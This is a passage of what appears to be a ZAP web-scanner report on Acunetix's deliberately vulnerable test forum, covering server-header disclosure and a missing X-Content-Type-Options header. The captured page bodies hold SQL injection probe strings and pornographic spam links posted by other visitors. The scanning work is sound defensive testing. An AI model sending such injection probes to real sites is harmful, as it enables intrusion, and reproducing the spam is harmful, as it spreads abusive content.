185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3426 |
| Response Body - size: 3,426 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3064 |
| Response Body - size: 3,064 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3057 |
| Response Body - size: 3,057 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3063 |
| Response Body - size: 3,063 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 336 |
| Solution |
Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.
|
| Reference |
http://httpd.apache.org/docs/current/mod/core.html#servertokens
http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007 http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 WSTG-v42-INFO-02 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 10036 |
|
Low |
X-Content-Type-Options Header Missing |
|---|---|
| Description |
The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - 